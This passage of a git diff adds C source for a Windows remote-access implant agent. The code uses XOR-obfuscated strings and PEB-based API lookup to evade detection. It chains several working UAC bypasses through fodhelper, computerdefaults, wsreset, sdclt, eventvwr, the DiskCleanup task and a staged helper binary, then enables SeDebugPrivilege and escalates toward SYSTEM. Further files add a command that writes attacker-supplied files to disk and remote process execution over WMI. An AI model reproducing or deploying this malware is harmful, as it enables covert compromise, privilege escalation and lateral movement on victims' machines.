= NULL; + if (!fn) { + char fs[16], ms[14]; volatile unsigned char _k = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_RegDeleteTreeA); i++) fs[i] = (char)(EVS_fn_RegDeleteTreeA[i] ^ _k); + fs[sizeof(EVS_fn_RegDeleteTreeA)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_advapi32); i++) ms[i] = (char)(EVS_dll_advapi32[i] ^ _k); + ms[sizeof(EVS_dll_advapi32)] = '\0'; + HMODULE m = _peb_module(ms); + SecureZeroMemory(ms, sizeof(ms)); + if (m) fn = (RegDelTree_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + if (fn) fn(root, subkey); +} + +static void shell_exec_wait(const char *exe, int wait_ms) +{ + typedef BOOL (WINAPI *fnSEE)(SHELLEXECUTEINFOW *); + static fnSEE pSEE = NULL; + if (!pSEE) { + char _sh[16], _dl[12]; + EVS_D(_sh, EVS_fn_ShellExecuteExW); + EVS_D(_dl, EVS_dll_shell32); + HMODULE h = _peb_module(_dl); + if (!h) h = LoadLibraryA(_dl); + SecureZeroMemory(_dl, sizeof(_dl)); + if (h) pSEE = (fnSEE)(void*)GetProcAddress(h, _sh); + SecureZeroMemory(_sh, sizeof(_sh)); + } + if (!pSEE) return; + WCHAR *w = to_wide(exe); + if (!w) return; + SHELLEXECUTEINFOW sei = {0}; + sei.cbSize = sizeof(sei); + sei.fMask = 0; + sei.lpVerb = L"open"; + sei.lpFile = w; + sei.nShow = SW_HIDE; + pSEE(&sei); + free(w); + Sleep((DWORD)wait_ms); +} + +static void make_safe_cmd(const char *cmdline, char *out, size_t outsz) +{ + /* Strip existing outer quotes to get a bare path, then re-wrap for start */ + char bare[2048 + MAX_PATH] = {0}; + if (cmdline[0] == '"') { + const char *end = strrchr(cmdline, '"'); + if (end && end != cmdline) { + size_t n = (size_t)(end - cmdline - 1); + if (n >= sizeof(bare)) n = sizeof(bare) - 1; + memcpy(bare, cmdline + 1, n); + bare[n] = '\0'; + } else { + strncpy(bare, cmdline, sizeof(bare) - 1); + } + } else { + strncpy(bare, cmdline, sizeof(bare) - 1); + } + bare[sizeof(bare) - 1] = '\0'; + snprintf(out, outsz, "cmd /c start \"\" \"%s\"", bare); +} + +static int bypass_lifter(const char *agent_path, char *out, size_t outsz) +{ + char self[MAX_PATH] = {0}; + GetModuleFileNameA(NULL, self, sizeof(self) - 1); + char lifter_path[MAX_PATH] = {0}; + strncpy(lifter_path, self, sizeof(lifter_path) - 1); + char *last = strrchr(lifter_path, '\\'); + if (!last) + return snprintf(out, outsz, "e:ps\n"), -1; + char _lfn[11]; + EVS_D(_lfn, EVS_str_lifter_exe); + snprintf(last + 1, (size_t)(lifter_path + sizeof(lifter_path) - last - 1), "%s", _lfn); + SecureZeroMemory(_lfn, sizeof(_lfn)); + + if (GetFileAttributesA(lifter_path) == INVALID_FILE_ATTRIBUTES) + return snprintf(out, outsz, "e:nf\n"), -1; + + char tmp[MAX_PATH]; + GetTempPathA((DWORD)sizeof(tmp), tmp); + char staged[MAX_PATH]; + char _pfx[8]; + EVS_D(_pfx, EVS_str_WinMgmt); + snprintf(staged, sizeof(staged), "%s%s%04lX.exe", + tmp, _pfx, (unsigned long)(GetTickCount() & 0xFFFF)); + SecureZeroMemory(_pfx, sizeof(_pfx)); + + if (!CopyFileA(lifter_path, staged, FALSE)) + return snprintf(out, outsz, "e:cp %lu\n", GetLastError()), -1; + + char exec[MAX_PATH * 2 + 8]; + snprintf(exec, sizeof(exec), "\"%s\" \"%s\"", staged, agent_path); + + STARTUPINFOA si = { sizeof(si) }; + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_HIDE; + PROCESS_INFORMATION pi = {0}; + + if (!CreateProcessA(NULL, exec, NULL, NULL, FALSE, + CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) { + DeleteFileA(staged); + return snprintf(out, outsz, "e:cr %lu\n", GetLastError()), -1; + } + + WaitForSingleObject(pi.hProcess, 6000); + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + DeleteFileA(staged); + + return snprintf(out, outsz, "ok\n"); +} + +static int bypass_fodhelper(const char *cmdline, char *out, size_t outsz) +{ + evasion_apply_thread(GetCurrentThread()); + + char _ms[12], _de[16]; + EVS_D(_ms, EVS_str_ms_settings); + EVS_D(_de, EVS_str_DelegateExecute); + + char key[128], root[64]; + snprintf(key, sizeof(key), "Software\\Classes\\%s\\shell\\open\\command", _ms); + snprintf(root, sizeof(root), "Software\\Classes\\%s", _ms); + SecureZeroMemory(_ms, sizeof(_ms)); + + char sys32[MAX_PATH], fod[MAX_PATH + 16]; + GetSystemDirectoryA(sys32, MAX_PATH); + char _fn[14]; + EVS_D(_fn, EVS_str_fodhelper_exe); + snprintf(fod, sizeof(fod), "%s\\%s", sys32, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + + char safe[2048 + MAX_PATH + 4] = {0}; + make_safe_cmd(cmdline, safe, sizeof(safe)); + + if (reg_set_sz(HKEY_CURRENT_USER, key, NULL, safe) != 0 || + reg_set_sz(HKEY_CURRENT_USER, key, _de, "") != 0) { + SecureZeroMemory(_de, sizeof(_de)); + reg_del_tree(HKEY_CURRENT_USER, root); + return snprintf(out, outsz, "e:reg\n"), -1; + } + SecureZeroMemory(_de, sizeof(_de)); + + shell_exec_wait(fod, 2000); + reg_del_tree(HKEY_CURRENT_USER, root); + + return snprintf(out, outsz, "ok\n"); +} + +static int bypass_computerdefaults(const char *cmdline, char *out, size_t outsz) +{ + evasion_apply_thread(GetCurrentThread()); + + char _ms[12], _de[16]; + EVS_D(_ms, EVS_str_ms_settings); + EVS_D(_de, EVS_str_DelegateExecute); + + char key[128], root[64]; + snprintf(key, sizeof(key), "Software\\Classes\\%s\\shell\\open\\command", _ms); + snprintf(root, sizeof(root), "Software\\Classes\\%s", _ms); + SecureZeroMemory(_ms, sizeof(_ms)); + + char sys32[MAX_PATH], bin[MAX_PATH + 24]; + GetSystemDirectoryA(sys32, MAX_PATH); + char _fn[21]; + EVS_D(_fn, EVS_str_computerdefaults_exe); + snprintf(bin, sizeof(bin), "%s\\%s", sys32, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + + char safe[2048 + MAX_PATH + 4] = {0}; + make_safe_cmd(cmdline, safe, sizeof(safe)); + + if (reg_set_sz(HKEY_CURRENT_USER, key, NULL, safe) != 0 || + reg_set_sz(HKEY_CURRENT_USER, key, _de, "") != 0) { + SecureZeroMemory(_de, sizeof(_de)); + reg_del_tree(HKEY_CURRENT_USER, root); + return snprintf(out, outsz, "e:reg\n"), -1; + } + SecureZeroMemory(_de, sizeof(_de)); + + shell_exec_wait(bin, 2000); + reg_del_tree(HKEY_CURRENT_USER, root); + + return snprintf(out, outsz, "ok\n"); +} + +static int bypass_wsreset(const char *cmdline, char *out, size_t outsz) +{ + evasion_apply_thread(GetCurrentThread()); + + char _clsid[36]; + EVS_D(_clsid, EVS_str_wsreset_clsid); + + char key[192], root[128]; + snprintf(key, sizeof(key), "Software\\Classes\\%s\\Shell\\open\\command", _clsid); + snprintf(root, sizeof(root), "Software\\Classes\\%s", _clsid); + SecureZeroMemory(_clsid, sizeof(_clsid)); + + char sys32[MAX_PATH], bin[MAX_PATH + 16]; + GetSystemDirectoryA(sys32, MAX_PATH); + char _fn[12]; + EVS_D(_fn, EVS_str_wsreset_exe); + snprintf(bin, sizeof(bin), "%s\\%s", sys32, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + + if (GetFileAttributesA(bin) == INVALID_FILE_ATTRIBUTES) { + return snprintf(out, outsz, "e:nf\n"), -1; + } + + char safe[2048 + MAX_PATH + 4] = {0}; + make_safe_cmd(cmdline, safe, sizeof(safe)); + + if (reg_set_sz(HKEY_CURRENT_USER, key, NULL, safe) != 0) { + reg_del_tree(HKEY_CURRENT_USER, root); + return snprintf(out, outsz, "e:reg\n"), -1; + } + + shell_exec_wait(bin, 3000); + reg_del_tree(HKEY_CURRENT_USER, root); + + return snprintf(out, outsz, "ok\n"); +} + +static int bypass_sdclt(const char *cmdline, char *out, size_t outsz) +{ + evasion_apply_thread(GetCurrentThread()); + + char _ef[8]; + EVS_D(_ef, EVS_str_exefile); + + char key[128], root[64]; + snprintf(key, sizeof(key), "Software\\Classes\\%s\\shell\\runas\\command", _ef); + snprintf(root, sizeof(root), "Software\\Classes\\%s", _ef); + SecureZeroMemory(_ef, sizeof(_ef)); + + char safe[2048 + MAX_PATH + 4] = {0}; + make_safe_cmd(cmdline, safe, sizeof(safe)); + + if (reg_set_sz(HKEY_CURRENT_USER, key, NULL, safe) != 0) { + reg_del_tree(HKEY_CURRENT_USER, root); + return snprintf(out, outsz, "e:reg\n"), -1; + } + + char sys32[MAX_PATH], sdp[MAX_PATH + 16]; + GetSystemDirectoryA(sys32, MAX_PATH); + char _fn[10]; + EVS_D(_fn, EVS_str_sdclt_exe); + snprintf(sdp, sizeof(sdp), "%s\\%s", sys32, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + + typedef BOOL (WINAPI *fnSEE)(SHELLEXECUTEINFOW *); + static fnSEE pSEE = NULL; + if (!pSEE) { + char _sh[16], _dl[12]; + EVS_D(_sh, EVS_fn_ShellExecuteExW); + EVS_D(_dl, EVS_dll_shell32); + HMODULE h = _peb_module(_dl); + SecureZeroMemory(_dl, sizeof(_dl)); + if (h) pSEE = (fnSEE)(void*)GetProcAddress(h, _sh); + SecureZeroMemory(_sh, sizeof(_sh)); + } + if (pSEE) { + WCHAR *wpath = to_wide(sdp); + if (wpath) { + SHELLEXECUTEINFOW sei = {0}; + sei.cbSize = sizeof(sei); + sei.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI; + sei.lpVerb = L"open"; + sei.lpFile = wpath; + sei.lpParameters = L"/KickOffElev"; + sei.nShow = SW_HIDE; + pSEE(&sei); + Sleep(400); + if (sei.hProcess) CloseHandle(sei.hProcess); + free(wpath); + } + } + + reg_del_tree(HKEY_CURRENT_USER, root); + return snprintf(out, outsz, "ok\n"); +} + +static int bypass_eventvwr(const char *cmdline, char *out, size_t outsz) +{ + evasion_apply_thread(GetCurrentThread()); + + char _mf[8]; + EVS_D(_mf, EVS_str_mscfile); + + char key[128], root[64]; + snprintf(key, sizeof(key), "Software\\Classes\\%s\\shell\\open\\command", _mf); + snprintf(root, sizeof(root), "Software\\Classes\\%s", _mf); + SecureZeroMemory(_mf, sizeof(_mf)); + + char safe[2048 + MAX_PATH + 4] = {0}; + make_safe_cmd(cmdline, safe, sizeof(safe)); + + if (reg_set_sz(HKEY_CURRENT_USER, key, NULL, safe) != 0) { + reg_del_tree(HKEY_CURRENT_USER, root); + return snprintf(out, outsz, "e:reg\n"), -1; + } + + char sys32[MAX_PATH], evtw[MAX_PATH + 16]; + GetSystemDirectoryA(sys32, MAX_PATH); + char _fn[13]; + EVS_D(_fn, EVS_str_eventvwr_exe); + snprintf(evtw, sizeof(evtw), "%s\\%s", sys32, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + + shell_exec_wait(evtw, 2000); + reg_del_tree(HKEY_CURRENT_USER, root); + + return snprintf(out, outsz, "ok\n"); +} + +static int bypass_diskcleanup(const char *cmdline, char *out, size_t outsz) +{ + evasion_apply_thread(GetCurrentThread()); + + char _ev[12], _wd[7]; + EVS_D(_ev, EVS_str_Environment); + EVS_D(_wd, EVS_str_windir); + + char hijacked[2048 + MAX_PATH + 32] = {0}; + snprintf(hijacked, sizeof(hijacked), "cmd /K \"%s\" & REM ", cmdline); + + if (reg_set_sz(HKEY_CURRENT_USER, _ev, _wd, hijacked) != 0) { + SecureZeroMemory(_ev, sizeof(_ev)); + SecureZeroMemory(_wd, sizeof(_wd)); + return snprintf(out, outsz, "e:wd\n"), -1; + } + + char sys32[MAX_PATH], sched[MAX_PATH + 16]; + GetSystemDirectoryA(sys32, MAX_PATH); + char _sfn[13]; + EVS_D(_sfn, EVS_str_schtasks_exe); + snprintf(sched, sizeof(sched), "%s\\%s", sys32, _sfn); + SecureZeroMemory(_sfn, sizeof(_sfn)); + + char _sc[14]; + EVS_D(_sc, EVS_str_SilentCleanup); + char taskpath[64]; + snprintf(taskpath, sizeof(taskpath), "\\Microsoft\\Windows\\DiskCleanup\\%s", _sc); + SecureZeroMemory(_sc, sizeof(_sc)); + + char full_cmd[MAX_PATH + 128]; + snprintf(full_cmd, sizeof(full_cmd), + "\"%s\" /Run /TN \"%s\" /I", sched, taskpath); + + STARTUPINFOA si = { sizeof(si) }; + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_HIDE; + PROCESS_INFORMATION pi = {0}; + + BOOL ok = CreateProcessA(NULL, full_cmd, NULL, NULL, FALSE, + CREATE_NO_WINDOW, NULL, NULL, &si, &pi); + if (ok) { + WaitForSingleObject(pi.hProcess, 3000); + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); + } + + Sleep(4000); + + HKEY henv = NULL; + if (RegOpenKeyExA(HKEY_CURRENT_USER, _ev, 0, KEY_SET_VALUE, &henv) == ERROR_SUCCESS) { + RegDeleteValueA(henv, _wd); + RegCloseKey(henv); + } + SecureZeroMemory(_ev, sizeof(_ev)); + SecureZeroMemory(_wd, sizeof(_wd)); + + if (!ok) + return snprintf(out, outsz, "e:st %lu\n", GetLastError()), -1; + + return snprintf(out, outsz, "ok\n"); +} + +static int bypass_runas(const char *cmdline, char *out, size_t outsz) +{ + if (!cmdline || !*cmdline) + return snprintf(out, outsz, "e:0\n"), -1; + + WCHAR *exe_w = to_wide(cmdline); + if (!exe_w) return snprintf(out, outsz, "e:w\n"), -1; + + typedef BOOL (WINAPI *fnSEE)(SHELLEXECUTEINFOW *); + static fnSEE pSEE = NULL; + if (!pSEE) { + char _sh[16], _dl[12]; + EVS_D(_sh, EVS_fn_ShellExecuteExW); + EVS_D(_dl, EVS_dll_shell32); + HMODULE h = _peb_module(_dl); + if (!h) h = LoadLibraryA(_dl); + SecureZeroMemory(_dl, sizeof(_dl)); + if (h) pSEE = (fnSEE)(void*)GetProcAddress(h, _sh); + SecureZeroMemory(_sh, sizeof(_sh)); + } + if (!pSEE) { free(exe_w); return snprintf(out, outsz, "e:see\n"), -1; } + + SHELLEXECUTEINFOW sei = {0}; + sei.cbSize = sizeof(sei); + sei.fMask = SEE_MASK_NOCLOSEPROCESS; + sei.lpVerb = L"runas"; + sei.lpFile = exe_w; + sei.lpParameters = L""; + sei.nShow = SW_SHOW; + + BOOL ok = pSEE(&sei); + DWORD err = GetLastError(); + free(exe_w); + + if (!ok) { + if (err == ERROR_CANCELLED) + return snprintf(out, outsz, "e:u\n"), -1; + return snprintf(out, outsz, "e:se %lu\n", err), -1; + } + + if (sei.hProcess) { + WaitForSingleObject(sei.hProcess, 3000); + CloseHandle(sei.hProcess); + } else { + Sleep(3000); + } + + return snprintf(out, outsz, "ok\n"); +} + +static void _enable_sedebug(void); + +int cmd_uacbypass(const char *args, char *output_buf, size_t output_size) +{ + memset(output_buf, 0, output_size); + + int il = get_integrity_level(); + + if (il >= IL_SYSTEM) { + snprintf(output_buf, output_size, "ok:s\n"); + return 0; + } + + if (il >= IL_HIGH) { + _enable_sedebug(); + return cmd_getsystem(NULL, output_buf, output_size); + } + + { + HANDLE htok = NULL; + TOKEN_ELEVATION_TYPE etype = TokenElevationTypeDefault; + { const adv_api_t *_a = adv_get(); + if (_a->OpenProcessToken && _a->OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htok)) { + DWORD tsz = sizeof(etype); + GetTokenInformation(htok, TokenElevationType, &etype, tsz, &tsz); + CloseHandle(htok); + } + } + if (etype != TokenElevationTypeLimited) { + snprintf(output_buf, output_size, "e:il\n"); + return -1; + } + } + + { + HKEY hpol = NULL; + DWORD consent = 0xFFFF, psz = sizeof(consent); + { char _rp[57], _rv[28]; volatile unsigned char _k = EVS_KEY; + for (int _i = 0; _i < (int)sizeof(EVS_str_reg_policies_system); _i++) + _rp[_i] = (char)(EVS_str_reg_policies_system[_i] ^ _k); + _rp[sizeof(EVS_str_reg_policies_system)] = '\0'; + for (int _i = 0; _i < (int)sizeof(EVS_str_ConsentPromptBehaviorAdmin); _i++) + _rv[_i] = (char)(EVS_str_ConsentPromptBehaviorAdmin[_i] ^ _k); + _rv[sizeof(EVS_str_ConsentPromptBehaviorAdmin)] = '\0'; + if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, _rp, 0, KEY_QUERY_VALUE, &hpol) == ERROR_SUCCESS) { + RegQueryValueExA(hpol, _rv, NULL, NULL, (BYTE *)&consent, &psz); + RegCloseKey(hpol); + } + SecureZeroMemory(_rp, sizeof(_rp)); SecureZeroMemory(_rv, sizeof(_rv)); } + size_t _diag_off = strlen(output_buf); + if (_diag_off < output_size - 1) + snprintf(output_buf + _diag_off, output_size - _diag_off, + "cp=%lu\n", consent); + } + + evasion_apply_thread(GetCurrentThread()); + + { + char own_id[AGENT_ID_LEN + 1]; + agent_gen_id(own_id); + agent_write_parent_id(own_id); + } + + char method[32] = "auto"; + char cmdline[2048] = {0}; + + char _m_auto[] = {'a','u','t','o',0}; + char _m_com[] = {'c','o','m',0}; + char _m_lft[] = {'l','i','f','t','e','r',0}; + char _m_fod[] = {'f','o','d','h','e','l','p','e','r',0}; + char _m_sdc[] = {'s','d','c','l','t',0}; + char _m_cdf[] = {'c','o','m','p','u','t','e','r','d','e','f','a','u','l','t','s',0}; + char _m_wsr[] = {'w','s','r','e','s','e','t',0}; + char _m_evt[] = {'e','v','e','n','t','v','w','r',0}; + char _m_dck[] = {'d','i','s','k','c','l','e','a','n','u','p',0}; + char _m_run[] = {'r','u','n','a','s',0}; + + if (!args || !*args) { + GetModuleFileNameA(NULL, cmdline, sizeof(cmdline) - 1); + } else { + const char *p = args; + char first[64] = {0}; + int i = 0; + while (*p && *p != ' ' && i < 63) first[i++] = *p++; + while (*p == ' ') p++; + + if (strcmp(first, _m_auto) == 0 || strcmp(first, _m_com) == 0 || + strcmp(first, _m_lft) == 0 || + strcmp(first, _m_fod) == 0 || strcmp(first, _m_sdc) == 0 || + strcmp(first, _m_cdf) == 0 || strcmp(first, _m_wsr) == 0 || + strcmp(first, _m_evt) == 0 || strcmp(first, _m_dck) == 0 || + strcmp(first, _m_run) == 0) { + strncpy(method, first, sizeof(method) - 1); + method[sizeof(method) - 1] = '\0'; + if (*p) { strncpy(cmdline, p, sizeof(cmdline) - 1); cmdline[sizeof(cmdline) - 1] = '\0'; } + else GetModuleFileNameA(NULL, cmdline, sizeof(cmdline) - 1); + } else { + strncpy(cmdline, args, sizeof(cmdline) - 1); + } + } + + char self_name[MAX_PATH] = {0}; + GetModuleFileNameA(NULL, self_name, sizeof(self_name) - 1); + const char *bn = strrchr(self_name, '\\'); + bn = bn ? bn + 1 : self_name; + + int before = count_proc(bn); + int rc = -1; + +#define TRY_BYPASS(fn_name, label) do { \ + agent_write_gs_flag(); \ + size_t _off = strlen(output_buf); \ + char *_b = (_off + 1 < output_size) ? output_buf + _off : output_buf + output_size - 1; \ + size_t _z = (_off + 1 < output_size) ? output_size - _off : 1; \ + rc = fn_name(cmdline, _b, _z); \ + if (rc >= 0) { \ + int after = before, gs_gone = 0; \ + for (int _w = 0; _w < 6; _w++) { \ + after = count_proc(bn); \ + gs_gone = !agent_gs_flag_exists(); \ + if (after > before || gs_gone) break; \ + Sleep(1000); \ + } \ + if (after > before || gs_gone) { \ + if (!after && gs_gone) { \ + size_t _gg = strlen(output_buf); \ + if (_gg + 1 < output_size) \ + snprintf(output_buf + _gg, output_size - _gg, "ok:gs\n"); \ + } \ + goto spawned; \ + } \ + rc = -1; \ + } \ +} while(0) + + if (strcmp(method, _m_lft) == 0) { + TRY_BYPASS(bypass_lifter, "lifter"); + } else if (strcmp(method, _m_run) == 0) { + TRY_BYPASS(bypass_runas, "runas"); + } else if (strcmp(method, _m_com) == 0) { + size_t _o0 = strlen(output_buf); + rc = bypass_com(cmdline, + output_buf + _o0, + _o0 < output_size ? output_size - _o0 : 1); + } else if (strcmp(method, _m_fod) == 0) { + TRY_BYPASS(bypass_fodhelper, "fodhelper"); + } else if (strcmp(method, _m_sdc) == 0) { + TRY_BYPASS(bypass_sdclt, "sdclt"); + } else if (strcmp(method, _m_cdf) == 0) { + TRY_BYPASS(bypass_computerdefaults, "computerdefaults"); + } else if (strcmp(method, _m_wsr) == 0) { + TRY_BYPASS(bypass_wsreset, "wsreset"); + } else if (strcmp(method, _m_evt) == 0) { + TRY_BYPASS(bypass_eventvwr, "eventvwr"); + } else if (strcmp(method, _m_dck) == 0) { + TRY_BYPASS(bypass_diskcleanup, "diskcleanup"); + } else { + TRY_BYPASS(bypass_lifter, "lifter"); + TRY_BYPASS(bypass_eventvwr, "eventvwr"); + TRY_BYPASS(bypass_diskcleanup, "diskcleanup"); + TRY_BYPASS(bypass_fodhelper, "fodhelper"); + TRY_BYPASS(bypass_computerdefaults, "computerdefaults"); + TRY_BYPASS(bypass_sdclt, "sdclt"); + TRY_BYPASS(bypass_wsreset, "wsreset"); + { + size_t _oc = strlen(output_buf); + char *_bc = (_oc + 1 < output_size) ? output_buf + _oc : output_buf + output_size - 1; + size_t _zc = (_oc + 1 < output_size) ? output_size - _oc : 1; + agent_write_gs_flag(); + int _before_c = before; + int _com_rc = bypass_com(cmdline, _bc, _zc); + if (_com_rc >= 0) { + Sleep(2000); + int _after_c = count_proc(bn); + int _gs_c = !agent_gs_flag_exists(); + if (_after_c > _before_c || _gs_c) { rc = 0; goto spawned; } + } + } + TRY_BYPASS(bypass_runas, "runas"); + } + + { + size_t off = strlen(output_buf); + if (off < output_size - 1) + snprintf(output_buf + off, output_size - off, "e:all\n"); + } + return -1; + +spawned:; + { + size_t off = strlen(output_buf); + if (off < output_size - 1) + snprintf(output_buf + off, output_size - off, "ok\n"); + } + return 0; +} + +static void _enable_sedebug(void) +{ + const adv_api_t *adv = adv_get(); + if (!adv->OpenProcessToken || !adv->LookupPrivilegeValueA || !adv->AdjustTokenPrivileges) + return; + HANDLE htok = NULL; + if (!adv->OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &htok)) return; + LUID luid; + char _sd[20]; { volatile unsigned char _k = EVS_KEY; + for (int _i = 0; _i < (int)sizeof(EVS_str_SeDebugPrivilege); _i++) + _sd[_i] = (char)(EVS_str_SeDebugPrivilege[_i] ^ _k); + _sd[sizeof(EVS_str_SeDebugPrivilege)] = '\0'; } + if (adv->LookupPrivilegeValueA(NULL, _sd, &luid)) { + TOKEN_PRIVILEGES tp; + tp.PrivilegeCount = 1; + tp.Privileges[0].Luid = luid; + tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + adv->AdjustTokenPrivileges(htok, FALSE, &tp, 0, NULL, NULL); + } + CloseHandle(htok); +} + +int cmd_privesc(char *out, size_t sz) +{ + return cmd_uacbypass(NULL, out, sz); +} diff --git a/agent/src/commands/upload.c b/agent/src/commands/upload.c new file mode 100644 index 0000000..c75d8dc --- /dev/null +++ b/agent/src/commands/upload.c @@ -0,0 +1,55 @@ +#include "commands.h" +#include "crypto.h" +#include +#include +#include +#include + +/* decode base64 data from server and write it to local_path */ +int cmd_upload(const char *local_path, const char *data_b64, + char *output_buf, size_t output_size) +{ + if (!local_path || !data_b64 || !output_buf) return -1; + + size_t raw_len = 0; + uint8_t *raw = base64_decode(data_b64, &raw_len); + if (!raw) { + snprintf(output_buf, output_size, "[upload] base64 decode failed\n"); + return -1; + } + + HANDLE fh = CreateFileA( + local_path, + GENERIC_WRITE, + 0, + NULL, + CREATE_ALWAYS, + FILE_ATTRIBUTE_NORMAL, + NULL + ); + + if (fh == INVALID_HANDLE_VALUE) { + snprintf(output_buf, output_size, + "[upload] CreateFile failed: %lu (path: %s)\n", + GetLastError(), local_path); + free(raw); + return -1; + } + + DWORD written = 0; + BOOL ok = WriteFile(fh, raw, (DWORD)raw_len, &written, NULL); + CloseHandle(fh); + free(raw); + + if (!ok || written != (DWORD)raw_len) { + snprintf(output_buf, output_size, + "[upload] WriteFile failed: %lu (wrote %lu / %zu bytes)\n", + GetLastError(), written, raw_len); + return -1; + } + + snprintf(output_buf, output_size, + "[upload] OK - wrote %zu bytes to %s\n", + raw_len, local_path); + return 0; +} diff --git a/agent/src/commands/wmi.c b/agent/src/commands/wmi.c new file mode 100644 index 0000000..47c50d6 --- /dev/null +++ b/agent/src/commands/wmi.c @@ -0,0 +1,191 @@ +#include "commands.h" +#include "evs_strings.h" +#include +#include +#include +#include +#include +#include +#include + +static const CLSID _clsid_WbemLocator = + {0x4590f811,0x1d3a,0x11d0,{0x89,0x1f,0x00,0xaa,0x00,0x4b,0x2e,0x24}}; +static const IID _iid_IWbemLocator = + {0xdc12a687,0x737f,0x11cf,{0x88,0x4d,0x00,0xaa,0x00,0x4b,0x2e,0x24}}; + +static BSTR _mbstr(const char *s) +{ + int n = MultiByteToWideChar(CP_ACP, 0, s, -1, NULL, 0); + if (n <= 0) return NULL; + WCHAR *ws = (WCHAR *)malloc((size_t)n * sizeof(WCHAR)); + if (!ws) return NULL; + MultiByteToWideChar(CP_ACP, 0, s, -1, ws, n); + BSTR b = SysAllocString(ws); + free(ws); + return b; +} + +int cmd_wmiexec(const char *host, const char *cmdline, + char *output_buf, size_t output_size) +{ + if (!host || !host[0] || !cmdline || !cmdline[0]) { + snprintf(output_buf, output_size, + "[wmiexec] usage: wmiexec \n"); + return -1; + } + + HRESULT hr; + BOOL co_init = FALSE; + int rc = -1; + + IWbemLocator *pLoc = NULL; + IWbemServices *pSvc = NULL; + IWbemClassObject *pClass = NULL; + IWbemClassObject *pInCls = NULL; + IWbemClassObject *pIn = NULL; + IWbemClassObject *pOut = NULL; + BSTR bNS = NULL, bCls = NULL, bMeth = NULL; + + hr = CoInitializeEx(NULL, COINIT_MULTITHREADED); + if (SUCCEEDED(hr)) { + co_init = TRUE; + } else if (hr != RPC_E_CHANGED_MODE) { + snprintf(output_buf, output_size, + "[wmiexec] CoInitializeEx: 0x%08lx\n", (unsigned long)hr); + return -1; + } + + CoInitializeSecurity(NULL, -1, NULL, NULL, + RPC_C_AUTHN_LEVEL_DEFAULT, + RPC_C_IMP_LEVEL_IMPERSONATE, + NULL, EOAC_NONE, NULL); + + hr = CoCreateInstance(&_clsid_WbemLocator, NULL, CLSCTX_INPROC_SERVER, + &_iid_IWbemLocator, (void **)&pLoc); + if (FAILED(hr)) { + snprintf(output_buf, output_size, + "[wmiexec] CoCreateInstance: 0x%08lx\n", (unsigned long)hr); + goto cleanup; + } + + char ns[320]; + snprintf(ns, sizeof(ns), "\\\\%s\\root\\cimv2", host); + bNS = _mbstr(ns); + if (!bNS) goto cleanup; + + hr = pLoc->lpVtbl->ConnectServer(pLoc, bNS, + NULL, NULL, NULL, 0, NULL, NULL, &pSvc); + if (FAILED(hr)) { + snprintf(output_buf, output_size, + "[wmiexec] ConnectServer(%s): 0x%08lx\n", + host, (unsigned long)hr); + goto cleanup; + } + + hr = CoSetProxyBlanket((IUnknown *)pSvc, + RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, + RPC_C_AUTHN_LEVEL_CALL, + RPC_C_IMP_LEVEL_IMPERSONATE, + NULL, EOAC_NONE); + if (FAILED(hr)) { + snprintf(output_buf, output_size, + "[wmiexec] CoSetProxyBlanket: 0x%08lx\n", (unsigned long)hr); + goto cleanup; + } + + { WCHAR _wp[14]; volatile unsigned char _k = EVS_KEY; + for (int _i = 0; _i < (int)sizeof(EVS_str_Win32_Process); _i++) + _wp[_i] = (WCHAR)(EVS_str_Win32_Process[_i] ^ _k); + _wp[sizeof(EVS_str_Win32_Process)] = L'\0'; + bCls = SysAllocString(_wp); + SecureZeroMemory(_wp, sizeof(_wp)); } + bMeth = SysAllocString(L"Create"); + if (!bCls || !bMeth) goto cleanup; + + hr = pSvc->lpVtbl->GetObject(pSvc, bCls, 0, NULL, &pClass, NULL); + if (FAILED(hr)) { + snprintf(output_buf, output_size, + "[wmiexec] GetObject(Win32_Process): 0x%08lx\n", + (unsigned long)hr); + goto cleanup; + } + + hr = pClass->lpVtbl->GetMethod(pClass, L"Create", 0, &pInCls, NULL); + if (FAILED(hr)) { + snprintf(output_buf, output_size, + "[wmiexec] GetMethod(Create): 0x%08lx\n", (unsigned long)hr); + goto cleanup; + } + + hr = pInCls->lpVtbl->SpawnInstance(pInCls, 0, &pIn); + if (FAILED(hr)) { + snprintf(output_buf, output_size, + "[wmiexec] SpawnInstance: 0x%08lx\n", (unsigned long)hr); + goto cleanup; + } + + { + BSTR bcmd = _mbstr(cmdline); + if (!bcmd) goto cleanup; + + VARIANT v; + VariantInit(&v); + V_VT(&v) = VT_BSTR; + V_BSTR(&v) = bcmd; + + hr = pIn->lpVtbl->Put(pIn, L"CommandLine", 0, &v, 0); + VariantClear(&v); + if (FAILED(hr)) { + snprintf(output_buf, output_size, + "[wmiexec] Put(CommandLine): 0x%08lx\n", (unsigned long)hr); + goto cleanup; + } + } + + hr = pSvc->lpVtbl->ExecMethod(pSvc, bCls, bMeth, 0, NULL, + pIn, &pOut, NULL); + if (FAILED(hr)) { + snprintf(output_buf, output_size, + "[wmiexec] ExecMethod: 0x%08lx\n", (unsigned long)hr); + goto cleanup; + } + + { + VARIANT vRet, vPid; + VariantInit(&vRet); VariantInit(&vPid); + pOut->lpVtbl->Get(pOut, L"ReturnValue", 0, &vRet, NULL, NULL); + pOut->lpVtbl->Get(pOut, L"ProcessId", 0, &vPid, NULL, NULL); + + DWORD ret_val = (vRet.vt == VT_I4 || vRet.vt == VT_UI4) + ? (DWORD)vRet.intVal : 0xFFFF; + DWORD pid_val = (vPid.vt == VT_I4 